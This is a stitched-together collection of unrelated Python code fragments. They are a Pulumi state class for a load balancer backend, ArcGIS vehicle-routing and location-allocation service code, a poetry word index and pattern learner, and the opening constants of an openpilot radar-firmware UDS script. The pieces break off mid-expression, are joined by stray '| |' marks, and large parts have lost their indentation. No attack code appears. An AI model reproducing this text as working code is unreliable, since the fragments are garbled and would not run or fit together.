             backend_set_name: Optional[pulumi.Input[str]] = None,
             ip_address: Optional[pulumi.Input[str]] = None,
             is_backup: Optional[pulumi.Input[bool]] = None,
             is_drain: Optional[pulumi.Input[bool]] = None,
             is_offline: Optional[pulumi.Input[bool]] = None,
             name: Optional[pulumi.Input[str]] = None,
             network_load_balancer_id: Optional[pulumi.Input[str]] = None,
             port: Optional[pulumi.Input[int]] = None,
             target_id: Optional[pulumi.Input[str]] = None,
             weight: Optional[pulumi.Input[int]] = None):
    """
    Input properties used for looking up and filtering Backend resources.

    Every argument is optional: a state object carries only the properties
    that are actually known. The fields have the same meaning as on
    BackendArgs.
    """
    # Record only the properties the caller actually supplied, in the
    # same order the generated code set them.
    for state_key, state_value in (
            ("backend_set_name", backend_set_name),
            ("ip_address", ip_address),
            ("is_backup", is_backup),
            ("is_drain", is_drain),
            ("is_offline", is_offline),
            ("name", name),
            ("network_load_balancer_id", network_load_balancer_id),
            ("port", port),
            ("target_id", target_id),
            ("weight", weight)):
        if state_value is not None:
            pulumi.set(__self__, state_key, state_value)
@property
@pulumi.getter(name="backendSetName")
def backend_set_name(self) -> Optional[pulumi.Input[str]]:
    """
    The name of the backend set to which to add the backend server. Example: `example_backend_set`
    """
    return pulumi.get(self, "backend_set_name")

@backend_set_name.setter
def backend_set_name(self, value: Optional[pulumi.Input[str]]):
    # Stored under the snake_case key; pulumi surfaces it to the engine as "backendSetName".
    pulumi.set(self, "backend_set_name", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
    """
    The IP address of the backend server. Example: `10.0.0.3`
    """
    return pulumi.get(self, "ip_address")

@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
    # Stored under the snake_case key; pulumi surfaces it to the engine as "ipAddress".
    pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isBackup")
def is_backup(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the network load balancer should treat this server as a backup unit. | |
self.lineBarriers),
('polygon_barriers', self.polygonBarriers),
('use_hierarchy_in_analysis', self.useHierarchy),
('restrictions', self.restrictions),
('attribute_parameter_values', self.attributeParameterValues),
('travel_mode', self.portalTravelMode),
('populate_route_lines', self.populateRouteLines),
('route_line_simplification_tolerance', self.routeLineSimplicationTolerance),
('populate_directions', self.populateDirections),
('directions_language', self.directionsLanguage),
('directions_style_name', self.directionsStyleName),
('time_zone_usage_for_time_fields', self.timeZoneUsageForTimeFields),
('save_output_layer', self.saveLayerFile),
('overrides', self.overrides),
('save_route_data', self.saveRouteData),
('service_capabilities', service_limits),
]
#Fail if no orders are given
order_count = int(arcpy.management.GetCount(self.orders).getOutput(0))
if order_count == 0:
arcpy.AddIDMessage("ERROR", 30138)
raise InputError
#Determine the network dataset to use. If analysis region is specified use that as
#the network dataset layer name
self._selectNetworkDataset(self.orders, self.depots)
if self.connectionFile:
#Add remote tool
self.logger.debug(u"Adding remote service {0} from {1}".format(self.serviceName, self.connectionFile))
remote_tool_name, remote_toolbox = add_remote_toolbox(self.connectionFile, self.serviceName)
#specify parameter values for the remote tool
#need to pass boolean values for boolean parameters when calling the remote service
task_params = [self.orders, self.depots, self.routes, self.breaks, self.timeUnits, self.distanceUnits,
"#", self.timeOfDay, self.uTurnAtJunctions, self.timeWindowFactor,
self.spatiallyClusterRoutes, self.routeZones, self.routeRenewals, self.orderPairs,
self.excessTransitFactor, self.pointBarriers, self.lineBarriers, self.polygonBarriers,
self.useHierarchy, "#", self.attributeParameterValues, self.populateRouteLines,
self.routeLineSimplicationTolerance, self.populateDirections, self.directionsLanguage,
self.directionsStyleName, self.portalTravelMode, self.impedance,
self.timeZoneUsageForTimeFields, self.saveLayerFile, self.overrides, self.saveRouteData]
#remove any unsupported restriction parameters
if self.isCustomTravelMode:
remote_tool_param_info = arcpy.GetParameterInfo(remote_tool_name)
remote_tool_restriction_param = remote_tool_param_info[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX]
task_params[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX] = get_valid_restrictions_remote_tool(remote_tool_restriction_param,
self.restrictions)
#execute the remote tool
self.toolResult = execute_remote_tool(remote_toolbox, remote_tool_name, task_params)
result_severity = self.toolResult.maxSeverity
if result_severity == -1:
result_severity = arcpy.GetMaxSeverity()
#SolveVRP tool always produces some result even in case of failure
if result_severity != 2:
#Save the results
solve_status = self.toolResult.getOutput(4)
if solve_status.lower() == 'true':
self.solveSucceeded = True
arcpy.management.CopyRows(self.toolResult.getOutput(0), self.outputUnassignedStops)
arcpy.management.CopyRows(self.toolResult.getOutput(1), self.outputStops)
arcpy.management.CopyFeatures(self.toolResult.getOutput(2), self.outputRoutes)
arcpy.management.CopyFeatures(self.toolResult.getOutput(3), self.outputDirections)
self.outputLayer = self.toolResult.getOutput(5)
self.outputRouteData = self.toolResult.getOutput(6)
else:
#Add the network dataset that we wish to use.
user_parameters.append(("network_dataset", self.outputNDS))
#Get the time attribute, distance attribute and feature locator where clause from config file
nds_property_values = self._getToolParametersFromNDSProperties()
#Create a dict that contains all the tool parameters and call the tool.
tool_parameters = dict(nds_property_values + constant_params + user_parameters)
#Update time attribute and distance attribute when using custom travel mode.
if self.isCustomTravelMode:
tool_parameters["time_attribute"] = self.customTravelModeTimeAttribute
tool_parameters["distance_attribute"] = self.customTravelModeDistanceAttribute
#Check if inputs are within the max walking extent if perform walk type analysis
self._checkWalkingExtent(self.orders, self.depots)
#Call the big button tool
self._executeBigButtonTool(tool_parameters)
#get outputs from the result
solve_status = self.toolResult.getOutput(0)
if solve_status.lower() == 'true':
self.solveSucceeded = True
self.outputUnassignedStops = self.toolResult.getOutput(1)
self.outputStops = self.toolResult.getOutput(2)
self.outputRoutes = self.toolResult.getOutput(3)
self.outputDirections = self.toolResult.getOutput(4)
self.outputLayer = self.toolResult.getOutput(5)
self.outputRouteData = self.toolResult.getOutput(6)
#Fail if the count of features in directions exceeds the maximum number of records
#returned by the service
if self.populateDirections:
self._checkMaxOutputFeatures(self.outputDirections)
#generalize directions features
arcpy.edit.Generalize(self.outputDirections, self.routeLineSimplicationTolerance)
#Log messages from execution of remote tool or big button tool
self._logToolExecutionMessages()
#Add metering and royalty messages
#numObjects = number of routes with orders
num_objects = 0
with arcpy.da.SearchCursor(self.outputRoutes, "OrderCount", "OrderCount IS NOT NULL") as cursor:
for row in cursor:
num_objects += 1
if num_objects:
arcpy.gp._arc_object.LogUsageMetering(5555, self.__class__.__name__, num_objects)
arcpy.gp._arc_object.LogUsageMetering(9999, self.outputNDS, num_objects)
except InputError as ex:
self._handleInputErrorException(ex)
except arcpy.ExecuteError:
self._handleArcpyExecuteErrorException()
except Exception as ex:
self._handleException()
return
class EditVehicleRoutingProblem(SolveVehicleRoutingProblem):
    '''EditVehicleRoutingProblem geoprocessing service.

    Behaves exactly like SolveVehicleRoutingProblem, but re-keys the service
    lookups to the synchronous VRP endpoint.
    '''
    # Base-class overrides: copy the extent-field list and point it at the sync service.
    EXTENT_FIELDS = list(NetworkAnalysisService.EXTENT_FIELDS)
    EXTENT_FIELDS[2] = "GPVehicleRoutingProblemSyncService"
    #MAX_FEATURES = 10000
    HELPER_SERVICES_KEY = "syncVRP"
class SolveLocationAllocation(NetworkAnalysisService):
    '''SolveLocationAllocation geoprocessing service'''
    # Names of the output datasets created inside the output geodatabase.
    OUTPUT_ALLOCATION_LINES_NAME = "AllocationLines"
    OUTPUT_DEMAND_POINTS_NAME = "DemandPoints"
    OUTPUT_FACILITIES_NAME = "Facilities"
    OUTPUT_ROUTE_EDGES_NAME = "RouteEdges"
    # Map user-facing parameter strings to geoprocessing tool keywords.
    TRAVEL_DIR_KEYWORDS = {
        "Facility to Demand" : "FACILITY_TO_DEMAND",
        "Demand to Facility" : "DEMAND_TO_FACILITY"
    }
    PROBLEM_TYPE_KEYWORDS = {
        "Maximize Attendance": "MAXIMIZE_ATTENDANCE",
        "Maximize Capacitated Coverage": "MAXIMIZE_CAPACITATED_COVERAGE",
        "Maximize Coverage" : "MAXIMIZE_COVERAGE",
        "Maximize Market Share" : "MAXIMIZE_MARKET_SHARE",
        "Minimize Facilities" : "MINIMIZE_FACILITIES",
        "Minimize Impedance" : "MINIMIZE_IMPEDANCE",
        "Target Market Share" : "TARGET_MARKET_SHARE"
    }
    # Base-class override: extent lookups key off the location-allocation service.
    EXTENT_FIELDS = NetworkAnalysisService.EXTENT_FIELDS[:]
    EXTENT_FIELDS[2] = "GPLocationAllocationService"
    #MAX_FEATURES = 1000000
    # Index of the restrictions parameter in the remote tool's positional signature.
    REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX = 19
    TOOL_NAME = "SolveLocationAllocation_na"
    HELPER_SERVICES_KEY = "asyncLocationAllocation"
    def __init__(self, *args, **kwargs):
        '''Constructor.

        Stores the location-allocation tool parameters from **kwargs as instance
        attributes and derives the output dataset paths.
        '''
        #Call the base class constructor to sets the common tool parameters as instance attributes
        super(SolveLocationAllocation, self).__init__(*args, **kwargs)
        #Store tool parameters as instance attributes
        self.facilities = kwargs.get("Facilities", None)
        self.demandPoints = kwargs.get("Demand_Points", None)
        self.problemType = kwargs.get("Problem_Type", None)
        self.facilitiesToFind = kwargs.get("Number_of_Facilities_to_Find", None)
        #NOTE(review): attribute name carries a pre-existing "deafult" typo; kept for
        #compatibility with any external readers of this attribute.
        self.deafultMeasurementCutoff = kwargs.get("Default_Measurement_Cutoff", None)
        if self.deafultMeasurementCutoff:
            try:
                self.deafultMeasurementCutoff = str_to_float(self.deafultMeasurementCutoff)
            except ValueError as ex:
                #Non-numeric text is treated the same as "no cutoff".
                self.deafultMeasurementCutoff = None
        self.defaultCapacity = kwargs.get("Default_Capacity", None)
        self.targetMarketShare = kwargs.get("Target_Market_Share", None)
        self.travelDirection = kwargs.get("Travel_Direction", None)
        self.measurementTransformationModel = kwargs.get("Measurement_Transformation_Model", None)
        self.measurementTransformationFactor = kwargs.get("Measurement_Transformation_Factor", None)
        self.allocationLineShape = kwargs.get("Allocation_Line_Shape", None)
        #Print tool parameter values for debugging
        if self.logger.DEBUG:
            for param in sorted(kwargs):
                self.logger.debug(u"{0}: {1}".format(param, kwargs[param]))
        #derived outputs
        self.outputAllocationLines = os.path.join(self.outputGeodatabase, self.OUTPUT_ALLOCATION_LINES_NAME)
        self.outputDemandPoints = os.path.join(self.outputGeodatabase, self.OUTPUT_DEMAND_POINTS_NAME)
        self.outputFacilities = os.path.join(self.outputGeodatabase, self.OUTPUT_FACILITIES_NAME)
    def execute(self):
        '''Main execution logic.

        Solves the location-allocation problem either via a remote geoprocessing
        service (when a connection file is configured) or via the local "big
        button" tool, then copies/exposes the outputs and logs metering info.
        '''
        try:
            arcpy.CheckOutExtension("network")
            #Get the properties for all network datasets from a propeties file.
            self._getNetworkDatasetProperties()
            #Select the travel mode
            self._selectTravelMode()
            #Get the values for big button tool parameters that are used as constraints
            service_limits = self._getServiceCapabilities()
            self.logger.debug("Service Limits: {0}".format(service_limits))
            #Define values for big button tool parameters that are not specified from the service
            constant_params = [('Maximum_Snap_Tolerance', '20 Kilometers'),
                               ('Accumulate_Attributes', []),
                               ('Output_Geodatabase', self.outputGeodatabase),
                               ('Output_Allocation_Lines_Name', self.OUTPUT_ALLOCATION_LINES_NAME),
                               ('Output_Demand_Points_Name', self.OUTPUT_DEMAND_POINTS_NAME),
                               ('Output_Facilities_Name', self.OUTPUT_FACILITIES_NAME),
                               ('Output_Route_Edges_Name', self.OUTPUT_ROUTE_EDGES_NAME),
                               ]
            #Create a list of user defined parameter names and their values
            user_parameters = [('Facilities', self.facilities),
                               ('Demand_Points', self.demandPoints),
                               ('Measurement_Units', self.measurementUnits),
                               ('Problem_Type', self.PROBLEM_TYPE_KEYWORDS[self.problemType]),
                               ('Number_of_Facilities_to_Find', self.facilitiesToFind),
                               ('Default_Measurement_Cutoff', self.deafultMeasurementCutoff),
                               ('Default_Capacity', self.defaultCapacity),
                               ('Target_Market_Share', self.targetMarketShare),
                               ('Measurement_Transformation_Model', self.measurementTransformationModel),
                               ('Measurement_Transformation_Factor', self.measurementTransformationFactor),
                               ('Travel_Direction', self.TRAVEL_DIR_KEYWORDS[self.travelDirection]),
                               ('Time_of_Day', self.timeOfDay),
                               ('Time_Zone_for_Time_of_Day', self.TIME_ZONE_USAGE_KEYWORDS[self.timeZoneUsage]),
                               ('UTurn_Policy', self.UTURN_KEYWORDS[self.uTurnAtJunctions]),
                               ('Allocation_Line_Shape', self.ROUTE_SHAPE_KEYWORDS[self.allocationLineShape]),
                               ('Point_Barriers', self.pointBarriers),
                               ('Line_Barriers', self.lineBarriers),
                               ('Polygon_Barriers', self.polygonBarriers),
                               ('Use_Hierarchy_in_Analysis', self.useHierarchy),
                               ('Restrictions', self.restrictions),
                               ('Attribute_Parameter_Values', self.attributeParameterValues),
                               ('Travel_Mode', self.portalTravelMode),
                               ('Save_Output_Network_Analysis_Layer', self.saveLayerFile),
                               ('Overrides', self.overrides),
                               ]
            #Fail if no facilities or demand points are given
            demand_point_count = int(arcpy.management.GetCount(self.demandPoints).getOutput(0))
            facility_count = int(arcpy.management.GetCount(self.facilities).getOutput(0))
            if demand_point_count == 0 or facility_count == 0:
                arcpy.AddIDMessage("ERROR", 30139)
                raise InputError
            #Determine the network dataset to use. If analysis region is specified use that as
            #the network dataset layer name
            self._selectNetworkDataset(self.demandPoints, self.facilities)
            if self.connectionFile:
                #Add remote tool
                self.logger.debug(u"Adding remote service {0} from {1}".format(self.serviceName, self.connectionFile))
                remote_tool_name, remote_toolbox = add_remote_toolbox(self.connectionFile, self.serviceName)
                #specify parameter values for the remote tool
                #need to pass boolean values for boolean parameters when calling the remote service
                #NOTE: the list is positional and must match the remote tool's signature
                #exactly; "#" marks parameters left at their service defaults.
                task_params = [self.facilities, self.demandPoints, self.measurementUnits, "#", self.problemType,
                               self.facilitiesToFind, self.deafultMeasurementCutoff, self.defaultCapacity,
                               self.targetMarketShare, self.measurementTransformationModel,
                               self.measurementTransformationFactor, self.travelDirection, self.timeOfDay,
                               self.timeZoneUsage, self.uTurnAtJunctions, self.pointBarriers, self.lineBarriers,
                               self.polygonBarriers, self.useHierarchy, "#", self.attributeParameterValues,
                               self.allocationLineShape, self.portalTravelMode, self.impedance, self.saveLayerFile,
                               self.overrides]
                #remove any unsupported restriction parameters when using a custom travel mode
                if self.isCustomTravelMode:
                    remote_tool_param_info = arcpy.GetParameterInfo(remote_tool_name)
                    remote_tool_restriction_param = remote_tool_param_info[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX]
                    task_params[self.REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX] = get_valid_restrictions_remote_tool(remote_tool_restriction_param,
                                                                                                               self.restrictions)
                #execute the remote tool
                self.toolResult = execute_remote_tool(remote_toolbox, remote_tool_name, task_params)
                #report errors and exit in case the remote tool failed.
                if self.toolResult.maxSeverity == 2:
                    error_messages = self.toolResult.getMessages(1) + self.toolResult.getMessages(2)
                    raise InputError(error_messages)
                else:
                    #Save the results
                    solve_status = self.toolResult.getOutput(0)
                    if solve_status.lower() == 'true':
                        self.solveSucceeded = True
                    #Remote tool output indices: 1=allocation lines, 2=facilities,
                    #3=demand points, 4=layer file (differs from the big button tool below).
                    arcpy.management.CopyFeatures(self.toolResult.getOutput(1), self.outputAllocationLines)
                    arcpy.management.CopyFeatures(self.toolResult.getOutput(2), self.outputFacilities)
                    arcpy.management.CopyFeatures(self.toolResult.getOutput(3), self.outputDemandPoints)
                    self.outputLayer = self.toolResult.getOutput(4)
            else:
                #Add the network dataset that we wish to use.
                user_parameters.append(("Network_Dataset", self.outputNDS))
                #Get the time attribute, distance attribute and feature locator where clause from config file
                nds_property_values = self._getToolParametersFromNDSProperties()
                #Create a dict that contains all the tool parameters and call the tool.
                tool_parameters = dict(nds_property_values + constant_params + user_parameters)
                tool_parameters.update(service_limits)
                #Update time attribute and distance attribute when using custom travel mode.
                if self.isCustomTravelMode:
                    tool_parameters["Time_Attribute"] = self.customTravelModeTimeAttribute
                    tool_parameters["Distance_Attribute"] = self.customTravelModeDistanceAttribute
                #Check if inputs are within the max walking extent when performing a walk type analysis
                self._checkWalkingExtent(self.demandPoints, self.facilities)
                #Call the big button tool
                self._executeBigButtonTool(tool_parameters)
                #get outputs from the result
                solve_status = self.toolResult.getOutput(0)
                if solve_status.lower() == 'true':
                    self.solveSucceeded = True
                #Big button tool output indices: 1=allocation lines, 2=facilities,
                #3=demand points, 5=layer file.
                self.outputAllocationLines = self.toolResult.getOutput(1)
                self.outputFacilities = self.toolResult.getOutput(2)
                self.outputDemandPoints = self.toolResult.getOutput(3)
                self.outputLayer = self.toolResult.getOutput(5)
            #Log messages from execution of remote or big button tool
            self._logToolExecutionMessages()
            #Fail if the count of features in output demand points exceeds the maximum number of records returned by
            #the service
            self._checkMaxOutputFeatures(self.outputDemandPoints, 30170)
            #Add metering and royalty messages
            #numObjects = number of allocated demand points
            output_demand_points_layer = "OutputDemandPointsLayer"
            allocated_demand_points_where_clause = "FacilityOID IS NOT NULL"
            arcpy.management.MakeFeatureLayer(self.outputDemandPoints, output_demand_points_layer,
                                              allocated_demand_points_where_clause)
            num_objects = int(arcpy.management.GetCount(output_demand_points_layer).getOutput(0))
            if num_objects:
                arcpy.gp._arc_object.LogUsageMetering(5555, self.__class__.__name__, num_objects)
                arcpy.gp._arc_object.LogUsageMetering(9999, self.outputNDS, num_objects)
        except InputError as ex:
            self._handleInputErrorException(ex)
        except arcpy.ExecuteError:
            self._handleArcpyExecuteErrorException()
        except Exception as ex:
            self._handleException()
        return
class GenerateOriginDestinationCostMatrix(NetworkAnalysisService):
'''GenerateOriginDestinationCostMatrix geoprocessing service'''
OUTPUT_OD_LINES_NAME = "ODLines"
OUTPUT_ORIGINS_NAME = "Origins"
OUTPUT_DESTINATIONS_NAME = "Destinations"
EXTENT_FIELDS = NetworkAnalysisService.EXTENT_FIELDS[:]
EXTENT_FIELDS[2] = "GPOriginDestinationCostMatrixService"
REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX = 15
TOOL_NAME = "GenerateOriginDestinationCostMatrix_na"
HELPER_SERVICES_KEY = "asyncODCostMatrix"
def __init__(self, *args, **kwargs):
'''constructor'''
#Call the base class constructor to sets the common tool parameters as instance attributes
super(GenerateOriginDestinationCostMatrix, self).__init__(*args, **kwargs)
#Store tool parameters as instance attributes
self.origins = kwargs.get("Origins", None)
self.destinations = kwargs.get("Destinations", None)
self.timeUnits = kwargs.get("Time_Units", None)
self.distanceUnits = kwargs.get("Distance_Units", None)
self.destinationsToFind = kwargs.get("Number_of_Destinations_to_Find", None)
self.cutoff = kwargs.get("Cutoff", None)
if self.cutoff:
try:
self.cutoff = | |
rhyme))
elif not rhyme:
words = self.assemble_from_db('where stress = ? and type = ?', (stress, word_type))
else:
words = self.assemble_from_db('where stress = ? and rhyme = ? and type = ?', (stress, rhyme, word_type))
return words
def get_word_count(self, stress, rhyme=None):
    """Return the number of distinct indexed words matching *stress* (and, optionally, *rhyme*)."""
    query_n_param = (
        ('select count (distinct text) from word where stress = ? and rhyme = ?', (stress, rhyme))
        if rhyme else
        ('select count (distinct text) from word where stress = ?', (stress,))
    )
    logging.debug('querying : %s', query_n_param)
    (count,) = self.connection.execute(*query_n_param).fetchone()
    return count
def get_word_variants(self, text):
    """Return all indexed entries for *text*; lookup is case-insensitive (index stores lower-case)."""
    return self.assemble_from_db('where text = ?', (text.lower(),))
def known_rhyme_types(self):
    """Yield each distinct rhyme value present in the index."""
    for (rhyme_value,) in self.connection.execute('select distinct rhyme from word'):
        yield rhyme_value
def __repr__(self):
    """Summarize the index: total entry count and distinct word count."""
    total_entries, distinct_words = self.connection.execute(
        'select count (*), count (distinct text) from word').fetchone()
    return 'poetry index with {} indexed entries ({} distinct words)\n'.format(
        total_entries, distinct_words)
class PoemPatternLearner(object):
def __init__(self, index, text):
self.index = index
self.line_type_counts = {
0: collections.Counter(),
1: collections.Counter(),
2: collections.Counter(),
3: collections.Counter(),
4: collections.Counter(),
5: collections.Counter(),
6: collections.Counter(),
7: collections.Counter(),
8: collections.Counter(),
9: collections.Counter(),
}
self.line_count = self.empty_count = self.comment_count = self.token_count = 0
for line in text:
self.process_line(line)
logging.info('parsed %s lines (skipped %s empties and %s comments) and %s tokens',
self.line_count, self.empty_count, self.comment_count, self.token_count)
@classmethod
def all_combinations(cls, list_of_iterables):
"""
recursive method for traversing lists of iterables
iterables may not be empty
yields every possible path through the list whith each path touching one element from each iterable
"""
if len(list_of_iterables) == 1:
for element in list_of_iterables[0]:
yield [element]
else:
for element in list_of_iterables[0]:
for suffix in cls.all_combinations(list_of_iterables[1:]):
yield [element] + suffix
@classmethod
def all_combinations_count(cls, list_of_iterables):
count = 1
for iterable in list_of_iterables:
count *= len(iterable)
return count
def process_line(self, line):
self.line_count += 1
if line[0] == '#':
self.comment_count += 1
return
line = line.strip()
words = re.findall('[\w\']+', line)
if not words:
self.empty_count += 1
return
logging.info('on line %d processing %d tokens: %s', self.line_count, len(words), line)
# count tokens for stats
self.token_count += len(words)
# replace each token with possible word variants
# line is a list of lists; inner lists hold word variants (sound, stress, and type variants) for each token
words = list(map(lambda token: list(self.index.get_word_variants(token)), words))
# do not proceed if a word is not known
for word_variant_list in words:
if not word_variant_list:
return
# collect word types
types = map(lambda word_variant_list: map(lambda word: word.types, word_variant_list), words)
types = map(lambda type_variants_lists: sum(type_variants_lists, list()), types)
types = list(map(set, types))
if self.all_combinations_count(types) < 1000000:
word_count = len(types) if len(types) < 10 else 0
types = self.all_combinations(types)
types = map(lambda type_combination: '-'.join(type_combination), types)
self.line_type_counts[word_count].update(types)
else:
logging.warning('too many word type combinations in line %s. skipping it as source for valid types.', line)
logging.debug('processed %d line with %d tokens: %s', self.line_count, len(words), line)
def __repr__(self):
    """
    Render the collected line-pattern counters (buckets 1..9, top 20 each)
    as a Python-literal-style snippet suitable for pasting into source.
    """
    chunks = [' line_patterns = {\n']
    for size in range(1, 10):
        counter = self.line_type_counts[size]
        chunks.append(' {:d}: [ # {:d} cases\n'.format(size, sum(counter.values())))
        for pattern, occurrences in counter.most_common(20):
            quoted = "', '".join(pattern.split('-'))
            chunks.append(" ['{:s}'], # {:d} occurrences \n".format(quoted, occurrences))
        chunks.append(' ],\n')
    chunks.append(' }\n')
    return ''.join(chunks)
class Poem(object):
# collected using PoemPatternLearner
line_patterns = {
1: [ # 2 cases
['verb'], # 1 occurrences
['noun'], # 1 occurrences
],
2: [ # 54 cases
['adjective', 'noun'], # 8 occurrences
['noun', 'noun'], # 7 occurrences
['verb', 'noun'], # 7 occurrences
['noun', 'adjective'], # 3 occurrences
['adjective', 'adjective'], # 3 occurrences
['pronoun', 'noun'], # 2 occurrences
['adverb', 'noun'], # 2 occurrences
['verb', 'adjective'], # 2 occurrences
['noun', 'adverb'], # 1 occurrences
['verb', 'adverb'], # 1 occurrences
['pronoun', 'adjective'], # 1 occurrences
['determiner', 'noun'], # 1 occurrences
['pronoun', 'adverb'], # 1 occurrences
['determiner', 'adjective'], # 1 occurrences
['preposition', 'noun'], # 1 occurrences
['adjective', 'verb'], # 1 occurrences
['adverb', 'verb'], # 1 occurrences
['preposition', 'verb'], # 1 occurrences
['adverb', 'adverb'], # 1 occurrences
['postposition', 'adverb'], # 1 occurrences
],
3: [ # 1286 cases
['noun', 'noun', 'noun'], # 26 occurrences
['verb', 'noun', 'noun'], # 24 occurrences
['verb', 'adverb', 'noun'], # 23 occurrences
['verb', 'adjective', 'noun'], # 21 occurrences
['noun', 'adjective', 'noun'], # 21 occurrences
['noun', 'adverb', 'noun'], # 19 occurrences
['noun', 'noun', 'verb'], # 19 occurrences
['verb', 'noun', 'verb'], # 18 occurrences
['noun', 'adverb', 'verb'], # 17 occurrences
['noun', 'verb', 'noun'], # 17 occurrences
['verb', 'adverb', 'verb'], # 17 occurrences
['adverb', 'noun', 'noun'], # 17 occurrences
['noun', 'adjective', 'verb'], # 16 occurrences
['verb', 'determiner', 'noun'], # 16 occurrences
['adverb', 'adjective', 'noun'], # 16 occurrences
['noun', 'verb', 'verb'], # 15 occurrences
['verb', 'adjective', 'verb'], # 15 occurrences
['verb', 'verb', 'noun'], # 15 occurrences
['adverb', 'adverb', 'noun'], # 15 occurrences
['noun', 'determiner', 'noun'], # 14 occurrences
],
4: [ # 10228 cases
['noun', 'noun', 'noun', 'noun'], # 37 occurrences
['noun', 'noun', 'noun', 'verb'], # 34 occurrences
['noun', 'verb', 'noun', 'verb'], # 34 occurrences
['noun', 'verb', 'noun', 'noun'], # 33 occurrences
['noun', 'noun', 'verb', 'noun'], # 30 occurrences
['adverb', 'noun', 'noun', 'verb'], # 29 occurrences
['noun', 'verb', 'adverb', 'noun'], # 29 occurrences
['adverb', 'noun', 'noun', 'noun'], # 29 occurrences
['noun', 'noun', 'adverb', 'noun'], # 29 occurrences
['adverb', 'noun', 'verb', 'noun'], # 27 occurrences
['noun', 'verb', 'verb', 'noun'], # 27 occurrences
['adverb', 'verb', 'noun', 'verb'], # 27 occurrences
['noun', 'verb', 'adverb', 'verb'], # 27 occurrences
['verb', 'noun', 'noun', 'noun'], # 26 occurrences
['noun', 'noun', 'verb', 'verb'], # 26 occurrences
['noun', 'verb', 'verb', 'verb'], # 26 occurrences
['noun', 'adverb', 'noun', 'noun'], # 26 occurrences
['noun', 'noun', 'adverb', 'verb'], # 25 occurrences
['adverb', 'verb', 'noun', 'noun'], # 25 occurrences
['verb', 'noun', 'verb', 'noun'], # 24 occurrences
],
5: [ # 38133 cases
['adverb', 'noun', 'noun', 'noun', 'noun'], # 32 occurrences
['verb', 'noun', 'noun', 'noun', 'noun'], # 31 occurrences
['adverb', 'noun', 'noun', 'noun', 'verb'], # 28 occurrences
['noun', 'noun', 'verb', 'noun', 'noun'], # 28 occurrences
['noun', 'noun', 'noun', 'noun', 'noun'], # 27 occurrences
['adverb', 'noun', 'verb', 'noun', 'verb'], # 27 occurrences
['adverb', 'noun', 'verb', 'noun', 'noun'], # 27 occurrences
['adverb', 'noun', 'noun', 'verb', 'verb'], # 25 occurrences
['noun', 'noun', 'verb', 'noun', 'verb'], # 24 occurrences
['adverb', 'determiner', 'noun', 'noun', 'noun'], # 24 occurrences
['adverb', 'adjective', 'noun', 'noun', 'noun'], # 24 occurrences
['noun', 'verb', 'verb', 'noun', 'noun'], # 23 occurrences
['verb', 'noun', 'verb', 'noun', 'noun'], # 23 occurrences
['verb', 'noun', 'noun', 'verb', 'noun'], # 23 occurrences
['noun', 'verb', 'noun', 'noun', 'noun'], # 23 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun'], # 23 occurrences
['noun', 'noun', 'noun', 'noun', 'verb'], # 23 occurrences
['verb', 'adjective', 'noun', 'noun', 'noun'], # 22 occurrences
['adverb', 'noun', 'verb', 'verb', 'verb'], # 22 occurrences
['verb', 'noun', 'verb', 'verb', 'noun'], # 22 occurrences
],
6: [ # 280978 cases
['noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 53 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun', 'noun'], # 50 occurrences
['noun', 'noun', 'noun', 'verb', 'adverb', 'noun'], # 49 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'noun'], # 49 occurrences
['noun', 'noun', 'noun', 'verb', 'noun', 'verb'], # 47 occurrences
['adverb', 'noun', 'noun', 'noun', 'noun', 'noun'], # 46 occurrences
['adverb', 'noun', 'noun', 'verb', 'adverb', 'noun'], # 46 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'verb'], # 45 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun', 'verb'], # 45 occurrences
['noun', 'noun', 'noun', 'verb', 'adjective', 'noun'], # 44 occurrences
['verb', 'noun', 'noun', 'verb', 'noun', 'noun'], # 44 occurrences
['noun', 'noun', 'verb', 'verb', 'noun', 'noun'], # 44 occurrences
['verb', 'noun', 'noun', 'noun', 'noun', 'noun'], # 43 occurrences
['noun', 'noun', 'noun', 'verb', 'adverb', 'verb'], # 43 occurrences
['noun', 'noun', 'noun', 'noun', 'adverb', 'noun'], # 43 occurrences
['noun', 'adverb', 'noun', 'verb', 'noun', 'noun'], # 42 occurrences
['noun', 'noun', 'noun', 'adverb', 'noun', 'noun'], # 42 occurrences
['adverb', 'adverb', 'noun', 'verb', 'noun', 'noun'], # 41 occurrences
['verb', 'noun', 'noun', 'noun', 'noun', 'verb'], # 41 occurrences
['adverb', 'noun', 'noun', 'verb', 'adverb', 'verb'], # 41 occurrences
],
7: [ # 671728 cases
['noun', 'noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 38 occurrences
['noun', 'noun', 'noun', 'noun', 'verb', 'noun', 'verb'], # 37 occurrences
['adverb', 'noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 35 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'noun', 'noun'], # 35 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', | |
<reponame>vandreykiv/openpilot<gh_stars>0
#!/usr/bin/env python3
import argparse
import os
import sys
import struct
import binascii
from tqdm import tqdm
from enum import IntEnum
import time
from selfdrive.car.modules.CFG_module import load_bool_param
from panda import Panda
from panda.python.uds import UdsClient, MessageTimeoutError, NegativeResponseError, _negative_response_codes
from panda.python.uds import SESSION_TYPE, ACCESS_TYPE, ROUTINE_CONTROL_TYPE, ROUTINE_IDENTIFIER_TYPE, RESET_TYPE,DATA_IDENTIFIER_TYPE
# md5sum of supported (unmodified) firmware
FW_MD5SUM = "9e51ddd80606fbdaaf604c73c8dde0d1"
# application firmware range in the radar's address space (inclusive bounds)
FW_START_ADDR = 0x7000
FW_END_ADDR = 0x45FFF
